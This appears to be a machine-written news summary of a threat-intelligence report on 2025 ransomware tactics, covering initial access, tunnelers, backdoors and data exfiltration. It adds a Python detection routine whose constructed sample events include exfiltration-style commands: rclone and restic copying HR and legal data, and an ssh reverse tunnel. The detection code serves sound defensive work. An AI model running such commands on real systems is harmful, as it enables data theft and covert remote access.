

Ethical Hacking News

Ransomware's Shifting Landscape: Trends, Techniques, and TTPs in an Evolving Threat Environment




In this article, we analyze key trends and techniques used by threat actors in 2025 ransomware incidents. We provide insights into the tactics, techniques, and procedures (TTPs) employed by threat actors to establish footholds, maintain presence, establish remote connections, and exfiltrate sensitive data from compromised systems.

With a record high number of victims posted to data leak sites in 2025, it is clear that ransomware operations continue to pose an ongoing threat to organizations worldwide. We analyze trends such as the continued importance of vulnerability management, the use of legitimate encryption tools, and the role of publicly available cloud services and utilities in exfiltrating sensitive data.

This report provides a comprehensive overview of the current state of ransomware tactics, techniques, and procedures in 2025. By examining the key trends and techniques used by threat actors, organizations can better understand the evolving threat landscape and develop effective strategies to mitigate and prevent future ransomware attacks.

  • Ransomware has become a pervasive threat since 2018, with financially motivated threat actors shaping the landscape.
  • The RaaS business model has lowered the barrier to entry for threat actors, making it more accessible and common.
  • The profitability of ransomware operations may be in decline due to improved cybersecurity practices, increased recovery capabilities, and declining ransom payment amounts.
  • New players have emerged to fill the vacuum left by previous prolific RaaS groups, highlighting the ongoing threat posed by ransomware operations.
  • Common techniques used by threat actors include exploitation of vulnerabilities, virtualization infrastructure targeting, and data exfiltration.
  • Threat actors often rely on compromised credentials, tunnelers, backdoors, and legitimate remote access tools to establish a foothold in victim environments.
  • The use of publicly available tools and utilities for data exfiltration and malicious activities continues to evolve.



    Ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region since 2018. The financially motivated threat actors who shifted their monetization strategy to post-compromise ransomware deployments back then have been instrumental in shaping this landscape. According to recent data from Google Threat Intelligence, ransomware operations have evolved significantly over time, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities.

    The proliferation of the ransomware-as-a-service (RaaS) business model is just one example of how the ransomware landscape has changed. This model allows threat actors to easily deploy ransomware without needing extensive technical knowledge or resources, making it more accessible to a wider range of individuals and groups. As a result, ransomware attacks have become increasingly common and diverse.

    Despite the growing threat, some indicators suggest that the overall profitability of ransomware operations may be in decline. Improved cybersecurity practices, increased ability of organizations to recover from ransomware attacks, and declining ransom payment amounts and rates are all contributing factors to this trend. Furthermore, numerous disruptions to the ransomware ecosystem over the years have impacted previously prolific RaaS groups like LockBit, ALPHV, Basta, and RansomHub.

    However, new players such as the Qilin and Akira RaaS operations have risen to fill the vacuum left by these groups. According to recent data from Google Threat Intelligence, a record high number of victims were posted to data leak sites (DLS) in 2025, highlighting the ongoing threat posed by ransomware operations.

    In this report, we analyze key trends and techniques used by threat actors in 2025 ransomware incidents. We observed that in a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls. This is consistent with previous years' observations but highlights the continued importance of vulnerability management.

    Threat actors also increasingly targeted virtualization infrastructure, rising from 29% in 2024 to 43% in 2025. The use of legitimate encryption tools by threat actors in extortion operations was also observed; in one incident, for example, BitLocker was used to encrypt over 200 remote hosts.

    Data exfiltration was another common technique used by threat actors, with 77 percent of analyzed ransomware intrusions including suspected data theft. Threat actors targeted a variety of sensitive data types, including legal, human resources, accounting, and business development data.

    Remote management tools were also commonly used to support the attack lifecycle, albeit at slightly lower rates than in previous years.

    Threat actors consistently relied on compromised credentials to establish a foothold in victim environments. Tunnelers, backdoors, or legitimate remote access tools were also employed by threat actors to maintain presence once inside victim environments.

    Tunnelers were widely used, both publicly available offerings such as PYSOXY, CHISEL, CLOUDFLARED, RPIVOT, and REVSOCKS.CLIENT and seemingly private tunnelers like LIONSHARE, VIPERTUNNEL, and BLUNDERBLIGHT. Tunnelers were also used to establish initial access.

    Threat actors often leveraged valid credentials, legitimate remote access tools or backdoors to establish a foothold in victim environments. The deployment of backdoors is particularly noteworthy; several backdoors including CORNFLAKE.V3.JAVASCRIPT, SQUIDGATE, FIREHAWK, HAVOCDEMON, and SMOKEDHAM were deployed.

    In addition to leveraging valid credentials or legitimate remote access tools to establish a foothold in victim environments, threat actors also used various malicious utilities to tunnel and proxy traffic within victim networks. These included SYSTEMBC, VIPERTUNNEL, PYSOXY, CLOUDFLARED, and OpenSSH.

    Threat actors frequently leveraged brute force attacks to gain access to accounts on additional systems. We observed multiple ransomware operations that leveraged network access to subsidiaries of victims to subsequently access the victim's network.

    During 2025, threat actors continued to use publicly available tools and utilities such as Rclone, MEGASync, Megatools, restic, and possibly Cyberduck to exfiltrate data. We observed threat actors targeting a variety of sensitive data types including legal, human resources, accounting, and business development data.

    Threat actors also leveraged legitimate cloud services and infrastructure to exfiltrate stolen data, including Azure, AWS, Backblaze, Cloudzy, Filemail, Google Drive, MEGA, and OneDrive.
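    As an added example (not from the report or from Google Threat Intelligence), the following Python triage routine flags the exfiltration utilities, tunnelers and cloud destinations named above in constructed process-creation events; the image names, hostname fragments, OpenSSH forwarding check and severity tiers are assumptions, and the sample telemetry is constructed.

```python
import re

# Data staging / exfiltration utilities named in the report (image basenames).
EXFIL_TOOLS = {"rclone.exe", "megasync.exe", "megaput.exe", "restic.exe", "cyberduck.exe"}
# Publicly available tunnelers named in the report; OpenSSH is checked separately
# because it is only suspicious with reverse (-R) or dynamic (-D) forwarding.
TUNNELERS = {"cloudflared.exe", "chisel.exe", "revsocks.exe", "pysoxy.exe"}
# Assumed hostname fragments for the cloud services the report lists.
CLOUD_DESTS = ("mega.nz", "backblazeb2.com", "drive.google.com", "1drv.ms", "onedrive.live.com",
               "filemail.com", "amazonaws.com", "blob.core.windows.net")

def triage(event):
    """Return (severity, reason) for one process-creation event, or None."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    dests = [d for d in CLOUD_DESTS if d in cmd.lower()]
    if image in EXFIL_TOOLS:
        # A known exfil tool plus a cloud destination is the strongest signal.
        return ("high", f"{image} sending data to {dests[0]}") if dests else ("medium", f"{image} executed")
    if image in TUNNELERS:
        return ("high", f"tunneler {image} executed")
    if image == "ssh.exe" and re.search(r"\s-[RD]\s", cmd):
        return ("medium", "OpenSSH reverse/dynamic port forwarding")
    if dests:
        return ("low", f"{image} contacted {dests[0]}")
    return None

def hunt(events):
    """Run triage over every event and return (pid, severity, reason) for flagged ones."""
    return [(e["ProcessId"],) + hit for e in events if (hit := triage(e))]

# Constructed sample telemetry, not real logs (203.0.113.5 is a documentation address).
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "Image": r"C:\Users\svc\rclone.exe",
     "CommandLine": r"rclone.exe copy D:\HR\ staging:hr --transfers 8"},
    {"ProcessId": 4108, "Image": r"C:\Temp\restic.exe",
     "CommandLine": r"restic.exe -r s3:s3.amazonaws.com/acme-backup backup D:\Legal"},
    {"ProcessId": 4122, "Image": r"C:\ProgramData\cloudflared.exe",
     "CommandLine": "cloudflared.exe tunnel run"},
    {"ProcessId": 4130, "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -N -R 8443:localhost:3389 ops@203.0.113.5"},
    {"ProcessId": 4141, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest -Uri https://www.filemail.com/upload"},
    {"ProcessId": 4150, "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for pid, severity, reason in hunt(SAMPLE_EVENTS):
        print(f"{pid} [{severity}] {reason}")
```

    Matching on image names alone is noisy in environments that legitimately use Rclone or restic for backups, so the cloud-destination correlation is what lifts an event to high severity here.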



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Ransomwares-Shifting-Landscape-Trends-Techniques-and-TTPs-in-a-Evolving-Threat-Environment-ehn.shtml

  • https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape/


  • https://www.cyberproof.com/blog/mid-year-threat-landscape-report-top-ransomware-trends-ttps-and-defense-strategies-for-2025/


  • Published: Mon Mar 16 11:58:43 2026 by llama3.2 3B Q4_K_M
